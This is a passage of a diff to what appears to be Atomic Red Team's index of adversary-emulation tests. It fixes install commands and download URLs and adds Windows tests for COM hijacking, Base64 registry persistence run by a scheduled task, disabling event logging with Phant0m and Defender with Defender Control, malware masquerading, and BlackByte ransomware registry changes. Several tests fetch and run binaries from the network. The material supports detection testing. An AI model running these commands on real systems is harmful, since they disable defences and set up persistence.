           apt-get && DEBIAN_FRONTEND=noninteractive apt-get install -y tcpdump tshark)\n"
       executor:
         command: |
@@ -4535,7 +4639,7 @@ credential-access:
           -v tshark)" ]; then exit 1; else exit 0; fi;
 
 '
-        get_prereq_command: "(which yum && yum -y epel-release tcpdump tshark)||(which
+        get_prereq_command: "(which yum && yum -y install epel-release tcpdump tshark)||(which
           apt-get && DEBIAN_FRONTEND=noninteractive apt-get install -y tcpdump tshark)\n"
       executor:
         command: "sudo tcpdump -c 5 -nnni #{interface}    \nif [ -x \"$(command -v
@@ -7787,7 +7891,7 @@ collection:
 
 '
         get_prereq_command: |
-          (which yum && yum -y epel-release zip)||(which apt-get && apt-get install -y zip)
+          (which yum && yum -y install epel-release zip)||(which apt-get && apt-get install -y zip)
           echo Please set input_files argument to include files that exist
       executor:
         name: sh
@@ -7893,8 +7997,8 @@ collection:
           ]; then exit 1; fi;
 
 '
-        get_prereq_command: "(which yum && yum -y epel-release zip gpg)||(which apt-get
-          && apt-get install -y zip gpg)\n"
+        get_prereq_command: "(which yum && yum -y install epel-release zip gpg)||(which
+          apt-get && apt-get install -y zip gpg)\n"
       executor:
         name: sh
         elevation_required: false
@@ -7958,6 +8062,20 @@ collection:
 
 '
         name: powershell
+    - name: Registry artefact when application use microphone
+      auto_generated_guid: 7a21cce2-6ada-4f7c-afd9-e1e9c481e44a
+      description: "[can-you-track-processes-accessing-the-camera-and-microphone](https://svch0st.medium.com/can-you-track-processes-accessing-the-camera-and-microphone-7e6885b37072)\n"
+      supported_platforms:
+      - windows
+      executor:
+        command: |
+          reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\CapabilityAccessManager\ConsentStore\microphone\NonPackaged\C:#Windows#Temp#atomic.exe /v LastUsedTimeStart /t REG_BINARY /d a273b6f07104d601 /f
+          reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\CapabilityAccessManager\ConsentStore\microphone\NonPackaged\C:#Windows#Temp#atomic.exe /v LastUsedTimeStop /t REG_BINARY /d 96ef514b7204d601 /f
+        cleanup_command: 'reg DELETE HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\CapabilityAccessManager\ConsentStore\microphone\NonPackaged\C:#Windows#Temp#atomic.exe
+          /f
+
+'
+        name: command_prompt
   T1119:
     technique:
       created: '2017-05-31T21:31:27.985Z'
@@ -10218,7 +10336,22 @@ collection:
       - Praetorian
       x_mitre_version: '1.0'
       x_mitre_is_subtechnique: false
-    atomic_tests: []
+      identifier: T1125
+    atomic_tests:
+    - name: Registry artefact when application use webcam
+      auto_generated_guid: 6581e4a7-42e3-43c5-a0d2-5a0d62f9702a
+      description: "[can-you-track-processes-accessing-the-camera-and-microphone](https://svch0st.medium.com/can-you-track-processes-accessing-the-camera-and-microphone-7e6885b37072)\n"
+      supported_platforms:
+      - windows
+      executor:
+        command: |
+          reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\CapabilityAccessManager\ConsentStore\webcam\NonPackaged\C:#Windows#Temp#atomic.exe /v LastUsedTimeStart /t REG_BINARY /d a273b6f07104d601 /f
+          reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\CapabilityAccessManager\ConsentStore\webcam\NonPackaged\C:#Windows#Temp#atomic.exe /v LastUsedTimeStop /t REG_BINARY /d 96ef514b7204d601 /f
+        cleanup_command: 'reg DELETE HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\CapabilityAccessManager\ConsentStore\webcam\NonPackaged\C:#Windows#Temp#atomic.exe
+          /f
+
+'
+        name: command_prompt
   T1056.003:
     technique:
       external_references:
@@ -11847,7 +11980,7 @@ privilege-escalation:
           $tempPath = cmd /c echo #{uacme_exe}
           if (Test-Path "$tempPath") {exit 0} else {exit 1}
         get_prereq_command: |
-          Invoke-WebRequest "https://github.com/justaseckev/atomic-red-team/raw/master/atomics/T1548.002/src/UACMe%20binaries.zip" -OutFile "$env:TEMP\uacme.zip"
+          Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1548.002/bin/uacme.zip" -OutFile "$env:TEMP\uacme.zip"
           Expand-Archive $env:TEMP\uacme.zip $env:TEMP\uacme -Force
           Remove-Item $env:TEMP\uacme.zip -Force
       executor:
@@ -11883,7 +12016,7 @@ privilege-escalation:
           $tempPath = cmd /c echo #{uacme_exe}
           if (Test-Path "$tempPath") {exit 0} else {exit 1}
         get_prereq_command: |
-          Invoke-WebRequest "https://github.com/justaseckev/atomic-red-team/raw/master/atomics/T1548.002/src/UACMe%20binaries.zip" -OutFile "$env:TEMP\uacme.zip"
+          Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1548.002/bin/uacme.zip" -OutFile "$env:TEMP\uacme.zip"
           Expand-Archive $env:TEMP\uacme.zip $env:TEMP\uacme -Force
           Remove-Item $env:TEMP\uacme.zip -Force
       executor:
@@ -11918,7 +12051,7 @@ privilege-escalation:
           $tempPath = cmd /c echo #{uacme_exe}
           if (Test-Path "$tempPath") {exit 0} else {exit 1}
         get_prereq_command: |
-          Invoke-WebRequest "https://github.com/justaseckev/atomic-red-team/raw/master/atomics/T1548.002/src/UACMe%20binaries.zip" -OutFile "$env:TEMP\uacme.zip"
+          Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1548.002/bin/uacme.zip" -OutFile "$env:TEMP\uacme.zip"
           Expand-Archive $env:TEMP\uacme.zip $env:TEMP\uacme -Force
           Remove-Item $env:TEMP\uacme.zip -Force
       executor:
@@ -11954,7 +12087,7 @@ privilege-escalation:
           $tempPath = cmd /c echo #{uacme_exe}
           if (Test-Path "$tempPath") {exit 0} else {exit 1}
         get_prereq_command: |
-          Invoke-WebRequest "https://github.com/justaseckev/atomic-red-team/raw/master/atomics/T1548.002/src/UACMe%20binaries.zip" -OutFile "$env:TEMP\uacme.zip"
+          Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1548.002/bin/uacme.zip" -OutFile "$env:TEMP\uacme.zip"
           Expand-Archive $env:TEMP\uacme.zip $env:TEMP\uacme -Force
           Remove-Item $env:TEMP\uacme.zip -Force
       executor:
@@ -11989,7 +12122,7 @@ privilege-escalation:
           $tempPath = cmd /c echo #{uacme_exe}
           if (Test-Path "$tempPath") {exit 0} else {exit 1}
         get_prereq_command: |
-          Invoke-WebRequest "https://github.com/justaseckev/atomic-red-team/raw/master/atomics/T1548.002/src/UACMe%20binaries.zip" -OutFile "$env:TEMP\uacme.zip"
+          Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1548.002/bin/uacme.zip" -OutFile "$env:TEMP\uacme.zip"
           Expand-Archive $env:TEMP\uacme.zip $env:TEMP\uacme -Force
           Remove-Item $env:TEMP\uacme.zip -Force
       executor:
@@ -12024,7 +12157,7 @@ privilege-escalation:
           $tempPath = cmd /c echo #{uacme_exe}
           if (Test-Path "$tempPath") {exit 0} else {exit 1}
         get_prereq_command: |
-          Invoke-WebRequest "https://github.com/justaseckev/atomic-red-team/raw/master/atomics/T1548.002/src/UACMe%20binaries.zip" -OutFile "$env:TEMP\uacme.zip"
+          Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1548.002/bin/uacme.zip" -OutFile "$env:TEMP\uacme.zip"
           Expand-Archive $env:TEMP\uacme.zip $env:TEMP\uacme -Force
           Remove-Item $env:TEMP\uacme.zip -Force
       executor:
@@ -12060,7 +12193,7 @@ privilege-escalation:
           $tempPath = cmd /c echo #{uacme_exe}
           if (Test-Path "$tempPath") {exit 0} else {exit 1}
         get_prereq_command: |
-          Invoke-WebRequest "https://github.com/justaseckev/atomic-red-team/raw/master/atomics/T1548.002/src/UACMe%20binaries.zip" -OutFile "$env:TEMP\uacme.zip"
+          Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1548.002/bin/uacme.zip" -OutFile "$env:TEMP\uacme.zip"
           Expand-Archive $env:TEMP\uacme.zip $env:TEMP\uacme -Force
           Remove-Item $env:TEMP\uacme.zip -Force
       executor:
@@ -12096,7 +12229,7 @@ privilege-escalation:
           $tempPath = cmd /c echo #{uacme_exe}
           if (Test-Path "$tempPath") {exit 0} else {exit 1}
         get_prereq_command: |
-          Invoke-WebRequest "https://github.com/justaseckev/atomic-red-team/raw/master/atomics/T1548.002/src/UACMe%20binaries.zip" -OutFile "$env:TEMP\uacme.zip"
+          Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1548.002/bin/uacme.zip" -OutFile "$env:TEMP\uacme.zip"
           Expand-Archive $env:TEMP\uacme.zip $env:TEMP\uacme -Force
           Remove-Item $env:TEMP\uacme.zip -Force
       executor:
@@ -12608,7 +12741,48 @@ privilege-escalation:
       - Elastic
       x_mitre_platforms:
       - Windows
-    atomic_tests: []
+      identifier: T1546.015
+    atomic_tests:
+    - name: COM Hijacking - InprocServer32
+      auto_generated_guid: 48117158-d7be-441b-bc6a-d9e36e47b52b
+      description: |-
+        This test uses PowerShell to hijack a reference to a Component Object Model by creating registry values under InprocServer32 key in the HKCU hive then calling the Class ID to be executed via rundll32.exe.
+
+        Reference: https://bohops.com/2018/06/28/abusing-com-registry-structure-clsid-localserver32-inprocserver32/
+      supported_platforms:
+      - windows
+      input_arguments:
+        clsid_threading:
+          description: Threading Model
+          type: string
+          default: Apartment
+        dllpath:
+          description: Path to the DLL.
+          type: String
+          default: "$env:TEMP\\AtomicTest.dll"
+        clsid:
+          description: Class ID to hijack.
+          type: string
+          default: "{B5F8350B-0548-48B1-A6EE-88BD00B4A5E7}"
+        clsid_description:
+          description: Description for CLSID
+          type: string
+          default: MSAA AccPropServices
+      dependency_executor_name: powershell
+      dependencies:
+      - description: DLL For testing
+        prereq_command: 'if (Test-Path #{dllpath}) {exit 0} else {exit 1}'
+        get_prereq_command: Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1546.015/bin/AtomicTest.dll"
+          -OutFile "#{dllpath}"
+      executor:
+        command: |-
+          New-Item -Path 'HKCU:\SOFTWARE\Classes\CLSID\#{clsid}' -Value '#{clsid_description}'
+          New-Item -Path 'HKCU:\SOFTWARE\Classes\CLSID\#{clsid}\InprocServer32' -Value #{dllpath}
+          New-ItemProperty -Path 'HKCU:\SOFTWARE\Classes\CLSID\#{clsid}\InprocServer32' -Name 'ThreadingModel' -Value '#{clsid_threading}' -PropertyType "String"
+          Start-Process -FilePath "C:\Windows\System32\RUNDLL32.EXE" -ArgumentList '-sta #{clsid}'
+        cleanup_command: Remove-Item -Path 'HKCU:\SOFTWARE\Classes\CLSID\#{clsid}'
+          -Recurse -ErrorAction Ignore
+        name: powershell
   T1053.007:
     technique:
       external_references:
@@ -18244,6 +18418,28 @@ privilege-escalation:
           >$null 2>&1
 
 '
+    - name: Scheduled Task Executing Base64 Encoded Commands From Registry
+      auto_generated_guid: e895677d-4f06-49ab-91b6-ae3742d0a2ba
+      description: "A Base64 Encoded command will be stored in the registry (ping
+        127.0.0.1) and then a scheduled task will be created.\nThe scheduled task
+        will launch powershell to decode and run the command in the rgistry daily.\nThis
+        is a persistence mechanism recently seen in use by Qakbot.  \n\n[Additiona
+        Information](https://thedfirreport.com/2022/02/07/qbot-likes-to-move-it-move-it/)\n"
+      supported_platforms:
+      - windows
+      input_arguments:
+        time:
+          description: Daily scheduled task execution time
+          type: string
+          default: 27900
+      executor:
+        command: |
+          reg add HKCU\SOFTWARE\ATOMIC-T1053.005 /v test /t REG_SZ /d cGluZyAxMjcuMC4wLjE= /f
+          schtasks.exe /Create /F /TN "ATOMIC-T1053.005" /TR "cmd /c start /min \"\" powershell.exe -Command IEX([System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String((Get-ItemProperty -Path HKCU:\\SOFTWARE\\ATOMIC-T1053.005).test)))" /sc daily /st #{time}
+        cleanup_command: |
+          schtasks /delete /tn "ATOMIC-T1053.005" /F >nul 2>&1
+          reg delete HKCU\SOFTWARE\ATOMIC-T1053.005 /F >nul 2>&1
+        name: command_prompt
   T1053:
     technique:
       id: attack-pattern--35dd844a-b219-4e2b-a6bb-efa9a75995a9
@@ -19975,9 +20171,12 @@ privilege-escalation:
         command_to_add:
           description: Command to add to the .bash_profile file
           type: String
-          default: "/path/to/script.py"
+          default: echo "Hello from Atomic Red Team T1546.004"
       executor:
-        command: 'echo "#{command_to_add}" >> ~/.bash_profile
+        command: 'echo ''#{command_to_add}'' >> ~/.bash_profile
+
+'
+        cleanup_command: 'sed -i ''/#{command_to_add}/d'' ~/.bash_profile
 
 '
         name: sh
@@ -19993,9 +20192,12 @@ privilege-escalation:
         command_to_add:
           description: Command to add to the .bashrc file
           type: String
-          default: "/path/to/script.py"
+          default: echo "Hello from Atomic Red Team T1546.004"
       executor:
-        command: 'echo "#{command_to_add}" >> ~/.bashrc
+        command: 'echo ''#{command_to_add}'' >> ~/.bashrc
+
+'
+        cleanup_command: 'sed -i ''/#{command_to_add}/d'' ~/.bashrc
 
 '
         name: sh
@@ -21786,7 +21988,7 @@ defense-evasion:
           $tempPath = cmd /c echo #{uacme_exe}
           if (Test-Path "$tempPath") {exit 0} else {exit 1}
         get_prereq_command: |
-          Invoke-WebRequest "https://github.com/justaseckev/atomic-red-team/raw/master/atomics/T1548.002/src/UACMe%20binaries.zip" -OutFile "$env:TEMP\uacme.zip"
+          Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1548.002/bin/uacme.zip" -OutFile "$env:TEMP\uacme.zip"
           Expand-Archive $env:TEMP\uacme.zip $env:TEMP\uacme -Force
           Remove-Item $env:TEMP\uacme.zip -Force
       executor:
@@ -21822,7 +22024,7 @@ defense-evasion:
           $tempPath = cmd /c echo #{uacme_exe}
           if (Test-Path "$tempPath") {exit 0} else {exit 1}
         get_prereq_command: |
-          Invoke-WebRequest "https://github.com/justaseckev/atomic-red-team/raw/master/atomics/T1548.002/src/UACMe%20binaries.zip" -OutFile "$env:TEMP\uacme.zip"
+          Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1548.002/bin/uacme.zip" -OutFile "$env:TEMP\uacme.zip"
           Expand-Archive $env:TEMP\uacme.zip $env:TEMP\uacme -Force
           Remove-Item $env:TEMP\uacme.zip -Force
       executor:
@@ -21857,7 +22059,7 @@ defense-evasion:
           $tempPath = cmd /c echo #{uacme_exe}
           if (Test-Path "$tempPath") {exit 0} else {exit 1}
         get_prereq_command: |
-          Invoke-WebRequest "https://github.com/justaseckev/atomic-red-team/raw/master/atomics/T1548.002/src/UACMe%20binaries.zip" -OutFile "$env:TEMP\uacme.zip"
+          Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1548.002/bin/uacme.zip" -OutFile "$env:TEMP\uacme.zip"
           Expand-Archive $env:TEMP\uacme.zip $env:TEMP\uacme -Force
           Remove-Item $env:TEMP\uacme.zip -Force
       executor:
@@ -21893,7 +22095,7 @@ defense-evasion:
           $tempPath = cmd /c echo #{uacme_exe}
           if (Test-Path "$tempPath") {exit 0} else {exit 1}
         get_prereq_command: |
-          Invoke-WebRequest "https://github.com/justaseckev/atomic-red-team/raw/master/atomics/T1548.002/src/UACMe%20binaries.zip" -OutFile "$env:TEMP\uacme.zip"
+          Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1548.002/bin/uacme.zip" -OutFile "$env:TEMP\uacme.zip"
           Expand-Archive $env:TEMP\uacme.zip $env:TEMP\uacme -Force
           Remove-Item $env:TEMP\uacme.zip -Force
       executor:
@@ -21928,7 +22130,7 @@ defense-evasion:
           $tempPath = cmd /c echo #{uacme_exe}
           if (Test-Path "$tempPath") {exit 0} else {exit 1}
         get_prereq_command: |
-          Invoke-WebRequest "https://github.com/justaseckev/atomic-red-team/raw/master/atomics/T1548.002/src/UACMe%20binaries.zip" -OutFile "$env:TEMP\uacme.zip"
+          Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1548.002/bin/uacme.zip" -OutFile "$env:TEMP\uacme.zip"
           Expand-Archive $env:TEMP\uacme.zip $env:TEMP\uacme -Force
           Remove-Item $env:TEMP\uacme.zip -Force
       executor:
@@ -21963,7 +22165,7 @@ defense-evasion:
           $tempPath = cmd /c echo #{uacme_exe}
           if (Test-Path "$tempPath") {exit 0} else {exit 1}
         get_prereq_command: |
-          Invoke-WebRequest "https://github.com/justaseckev/atomic-red-team/raw/master/atomics/T1548.002/src/UACMe%20binaries.zip" -OutFile "$env:TEMP\uacme.zip"
+          Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1548.002/bin/uacme.zip" -OutFile "$env:TEMP\uacme.zip"
           Expand-Archive $env:TEMP\uacme.zip $env:TEMP\uacme -Force
           Remove-Item $env:TEMP\uacme.zip -Force
       executor:
@@ -21999,7 +22201,7 @@ defense-evasion:
           $tempPath = cmd /c echo #{uacme_exe}
           if (Test-Path "$tempPath") {exit 0} else {exit 1}
         get_prereq_command: |
-          Invoke-WebRequest "https://github.com/justaseckev/atomic-red-team/raw/master/atomics/T1548.002/src/UACMe%20binaries.zip" -OutFile "$env:TEMP\uacme.zip"
+          Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1548.002/bin/uacme.zip" -OutFile "$env:TEMP\uacme.zip"
           Expand-Archive $env:TEMP\uacme.zip $env:TEMP\uacme -Force
           Remove-Item $env:TEMP\uacme.zip -Force
       executor:
@@ -22035,7 +22237,7 @@ defense-evasion:
           $tempPath = cmd /c echo #{uacme_exe}
           if (Test-Path "$tempPath") {exit 0} else {exit 1}
         get_prereq_command: |
-          Invoke-WebRequest "https://github.com/justaseckev/atomic-red-team/raw/master/atomics/T1548.002/src/UACMe%20binaries.zip" -OutFile "$env:TEMP\uacme.zip"
+          Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1548.002/bin/uacme.zip" -OutFile "$env:TEMP\uacme.zip"
           Expand-Archive $env:TEMP\uacme.zip $env:TEMP\uacme -Force
           Remove-Item $env:TEMP\uacme.zip -Force
       executor:
@@ -24992,6 +25194,37 @@ defense-evasion:
 '
         cleanup_command: 'wevtutil sl "#{log_name}" /e:true
 
+'
+        name: command_prompt
+    - name: Makes Eventlog blind with Phant0m
+      auto_generated_guid: 3ddf3d03-f5d6-462a-ad76-2c5ff7b6d741
+      description: 'Use [Phant0m](https://github.com/hlldz/Phant0m) to disable Eventlog
+
+'
+      supported_platforms:
+      - windows
+      input_arguments:
+        file_name:
+          description: exe version of Phant0m
+          type: Path
+          default: PathToAtomicsFolder\T1562.002\bin\Phant0m.exe
+      dependency_executor_name: powershell
+      dependencies:
+      - description: 'Phant0m.exe must exist on disk at specified location (#{file_name})
+
+'
+        prereq_command: 'if (Test-Path #{file_name}) {exit 0} else {exit 1}
+
+'
+        get_prereq_command: |
+          New-Item -Type Directory (split-path #{file_name}) -ErrorAction ignore | Out-Null
+          Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1562.002/bin/Phant0m.exe" -OutFile "#{file_name}" -UseBasicParsing
+      executor:
+        command: 'PathToAtomicsFolder\T1562.002\bin\Phant0m.exe
+
+'
+        cleanup_command: 'echo "Sorry you have to reboot"
+
 '
         name: command_prompt
   T1562.007:
@@ -25500,8 +25733,8 @@ defense-evasion:
         package_installer:
           description: Package installer command for linux. Default yum
           type: String
-          default: "(which yum && yum -y epel-release rsyslog)||(which apt-get &&
-            apt-get install -y rsyslog)"
+          default: "(which yum && yum -y install epel-release rsyslog)||(which apt-get
+            && apt-get install -y rsyslog)"
         flavor_command:
           description: Command to disable syslog collection. Default newer rsyslog
             commands. i.e older command = service rsyslog stop ; chkconfig off rsyslog
@@ -26090,6 +26323,45 @@ defense-evasion:
           /NoRestart /quiet
         name: command_prompt
         elevation_required: true
+    - name: Disable Defender with Defender Control
+      auto_generated_guid: 178136d8-2778-4d7a-81f3-d517053a4fd6
+      description: "Attempting to use Defender Control software to disable Windows
+        Defender. Upon successful execution, Windows Defender will be turned off.
+        \n"
+      supported_platforms:
+      - windows
+      input_arguments:
+        DefenderID:
+          description: Defender ID that is used as a sort of passcode to disable it
+            within Defender Control from the command line. The machine-specific Defender
+            ID can be obtained within Defender Control by going to menu, command line
+            info, and then retrieving the 4 character passcode to continue (listed
+            after defendercontrol /d /id in the command line info window).
+          type: String
+          default: FFFF
+        DefenderControlExe:
+          description: Path to Defender Control software version 1.6.
+          type: String
+          default: "$env:temp\\DefenderControl\\DefenderControl\\DefenderControl.exe"
+      dependency_executor_name: powershell
+      dependencies:
+      - description: "Defender Control must be installed on the machine. \n"
+        prereq_command: 'if (Test-Path #{DefenderControlExe}) {exit 0} else {exit
+          1}
+
+'
+        get_prereq_command: |
+          Start-BitsTransfer -Source "https://web.archive.org/web/20201210152711/https://www.sordum.org/files/download/defender-control/DefenderControl.zip" -Destination "$env:temp\defendercontrol.zip" -dynamic
+          expand-archive -LiteralPath "$env:temp\defendercontrol.zip" -DestinationPath "$env:temp\DefenderControl"
+      executor:
+        command: 'cmd /c #{DefenderControlExe} /D #{DefenderID} | Out-Null
+
+'
+        cleanup_command: 'cmd /c #{DefenderControlExe} /E | Out-Null
+
+'
+        name: powershell
+        elevation_required: true
   T1078.002:
     technique:
       external_references:
@@ -30805,6 +31077,37 @@ defense-evasion:
           start %ALLUSERSPROFILE%\cmd.exe
         cleanup_command: del %ALLUSERSPROFILE%\cmd.exe >nul 2>&1
         name: command_prompt
+    - name: Malware Masquerading and Execution from Zip File
+      auto_generated_guid: 4449c89b-ec82-43a4-89c1-91e2f1abeecc
+      description: When the file is unzipped and the README.cmd file opened, it executes
+        and changes the .pdf to .dll and executes the dll. This is a BazaLoader technique
+        [as reported here](https://twitter.com/ffforward/status/1481672378639912960)
+      supported_platforms:
+      - windows
+      input_arguments:
+        url:
+          description: Location of zip file
+          type: Url
+          default: https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1036/bin/T1036.zip
+      dependencies:
+      - description: Zip file must be present.
+        prereq_command: 'if (Test-Path $env:userprofile\Downloads\T1036.zip) {exit
+          0} else {exit 1}
+
+'
+        get_prereq_command: 'Invoke-WebRequest -OutFile "$env:userprofile\Downloads\T1036.zip"
+          #{url}
+
+'
+      executor:
+        command: |-
+          Expand-Archive -Path $env:userprofile\Downloads\T1036.zip -DestinationPath $env:userprofile\Downloads\T1036 -Force
+          cd $env:userprofile\Downloads\T1036
+          cmd /c $env:userprofile\Downloads\T1036\README.cmd >$null 2>$null
+        cleanup_command: |-
+          taskkill /IM Calculator.exe /f >$null 2>$null
+          Remove-Item $env:userprofile\Downloads\T1036 -recurse -ErrorAction Ignore
+        name: powershell
   T1036.005:
     technique:
       id: attack-pattern--1c4e5d32-1fe9-4116-9d9d-59e3925bd6a2
@@ -30889,6 +31192,36 @@ defense-evasion:
         cleanup_command: |
           rm -f $HOME/.../sh
           rmdir $HOME/.../
+    - name: Masquerade as a built-in system executable
+      auto_generated_guid: 35eb8d16-9820-4423-a2a1-90c4f5edd9ca
+      description: 'Launch an executable that attempts to masquerade as a legitimate
+        executable.
+
+'
+      supported_platforms:
+      - windows
+      input_arguments:
+        executable_filepath:
+          description: File path where the generated executable will be dropped and
+            executed from. The filename should be the name of a built-in system utility.
+          type: String
+          default: "$Env:windir\\Temp\\svchost.exe"
+      executor:
+        command: |
+          Add-Type -TypeDefinition @'
+          public class Test {
+              public static void Main(string[] args) {
+                  System.Console.WriteLine("tweet, tweet");
+              }
+          }
+          '@ -OutputAssembly "#{executable_filepath}"
+
+          Start-Process -FilePath "#{executable_filepath}"
+        cleanup_command: 'Remove-Item -Path "#{executable_filepath}" -ErrorAction
+          Ignore
+
+'
+        name: powershell
   T1556:
     technique:
       external_references:
@@ -31234,6 +31567,54 @@ defense-evasion:
 
 '
         name: powershell
+    - name: BlackByte Ransomware Registry Changes - CMD
+      auto_generated_guid: 4f4e2f9f-6209-4fcf-9b15-3b7455706f5b
+      description: |
+        This task recreates the steps taken by BlackByte ransomware before it worms to other machines.  See "Preparing to Worm" section: https://redcanary.com/blog/blackbyte-ransomware/
+        The steps are as follows:
+        <ol>
+            <li>1. Elevate Local Privilege by disabling UAC Remote Restrictions</li>
+            <li>2. Enable OS to share network connections between different privilege levels</li>
+            <li>3. Enable long path values for file paths, names, and namespaces to ensure encryption of all file names and paths</li>
+        </ol>
+        The registry keys and their respective values will be created upon successful execution.
+      supported_platforms:
+      - windows
+      executor:
+        command: |
+          cmd.exe /c reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v LocalAccountTokenFilterPolicy /t REG_DWORD /d 1 /f
+          cmd.exe /c reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLinkedConnections /t REG_DWORD /d 1 /f
+          cmd.exe /c reg add HKLM\SYSTEM\CurrentControlSet\Control\FileSystem /v LongPathsEnabled /t REG_DWORD /d 1 /f
+        cleanup_command: |
+          reg delete HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ /v LocalAccountTokenFilterPolicy /f 2>&1
+          reg delete HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ /v EnableLinkedConnections /f 2>&1
+          reg delete HKLM\SYSTEM\CurrentControlSet\Control\FileSystem\ /v LongPathsEnabled /f 2>&1
+        name: command_prompt
+        elevation_required: true
+    - name: BlackByte Ransomware Registry Changes - Powershell
+      auto_generated_guid: 0b79c06f-c788-44a2-8630-d69051f1123d
+      description: |
+        This task recreates the steps taken by BlackByte ransomware before it worms to other machines via Powershell.  See "Preparing to Worm" section: https://redcanary.com/blog/blackbyte-ransomware/
+        The steps are as follows:
+        <ol>
+            <li>1. Elevate Local Privilege by disabling UAC Remote Restrictions</li>
+            <li>2. Enable OS to share network connections between different privilege levels</li>
+            <li>3. Enable long path values for file paths, names, and namespaces to ensure encryption of all file names and paths</li>
+        </ol>
+        The registry keys and their respective values will be created upon successful execution.
+      supported_platforms:
+      - windows
+      executor:
+        command: |
+          New-ItemProperty "HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" -Name LocalAccountTokenFilterPolicy -PropertyType DWord -Value 1 -Force
+          New-ItemProperty "HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" -Name EnableLinkedConnections -PropertyType DWord -Value 1 -Force
+          New-ItemProperty "HKLM:\SYSTEM\CurrentControlSet\Control\FileSystem" -Name LongPathsEnabled -PropertyType DWord -Value 1 -Force
+        cleanup_command: |
+          Remove-ItemProperty "HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" -Name LocalAccountTokenFilterPolicy -Force
+          Remove-ItemProperty "HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" -Name EnableLinkedConnections -Force
+          Remove-ItemProperty "HKLM:\SYSTEM\CurrentControlSet\Control\FileSystem" -Name LongPathsEnabled -Force
+        name: powershell
+        elevation_required: true
   T1601:
     technique:
       external_references:
@@ -35958,7 +36339,65 @@ defense-evasion:
       - Linux
       - macOS
       - Windows
-    atomic_tests: []
+      identifier: T1564.006
+    atomic_tests:
+    - name: Register Portable Virtualbox
+      auto_generated_guid: c59f246a-34f8-4e4d-9276-c295ef9ba0dd
+      description: "ransomware payloads via virtual machines (VM). \n[Maze ransomware](https://threatpost.com/maze-ransomware-ragnar-locker-virtual-machine/159350/)\n"
+      supported_platforms:
+      - windows
+      input_arguments:
+        msi_file_path:
+          description: Path to the MSI file
+          type: Path
+          default: PathToAtomicsFolder\T1564.006\bin\Virtualbox_52.msi
+        cab_file_path:
+          description: Path to the CAB file
+          type: Path
+          default: PathToAtomicsFolder\T1564.006\bin\common.cab
+      dependency_executor_name: powershell
+      dependencies:
+      - description: 'MSI file must exist on disk at specified location (#{msi_file_path})
+
+'
+        prereq_command: 'if (Test-Path #{msi_file_path}) {exit 0} else {exit 1}
+
+'
+        get_prereq_command: |
+          New-Item -Type Directory (split-path #{msi_file_path}) -ErrorAction ignore | Out-Null
+          Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1564.006/bin/Virtualbox_52.msi" -OutFile "#{msi_file_path}"
+      - description: 'CAB file must exist on disk at specified location (#{cab_file_path})
+
+'
+        prereq_command: 'if (Test-Path #{cab_file_path}) {exit 0} else {exit 1}
+
+'
+        get_prereq_command: "New-Item -Type Directory (split-path #{cab_file_path})
+          -ErrorAction ignore | Out-Null\nInvoke-WebRequest \"https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1564.006/bin/common.cab\"
+          -OutFile \"#{cab_file_path}\" \n"
+      - description: 'Old version of Virtualbox must be installed
+
+'
+        prereq_command: 'if (Test-Path "C:\Program Files\Oracle\VirtualBox\VboxC.dll")
+          {exit 0} else {exit 1}
+
+'
+        get_prereq_command: 'msiexec /i #{msi_file_path} /qn
+
+'
+      executor:
+        command: |
+          "C:\Program Files\Oracle\VirtualBox\VBoxSVC.exe" /reregserver
+          regsvr32 /S "C:\Program Files\Oracle\VirtualBox\VboxC.dll"
+          rundll32 "C:\Program Files\Oracle\VirtualBox\VBoxRT.dll,RTR3Init"
+          sc create VBoxDRV binpath= "C:\Program Files\Oracle\VirtualBox\drivers\VboxDrv.sys" type= kernel start= auto error= normal displayname= PortableVBoxDRV
+          sc start VBoxDRV
+        cleanup_command: |
+          sc stop VBoxDRV
+          sc delete VBoxDRV
+          regsvr32 /u /S "C:\Program Files\Oracle\VirtualBox\VboxC.dll"
+          msiexec /x #{msi_file_path} /qn
+        name: command_prompt
   T1218.011:
     technique:
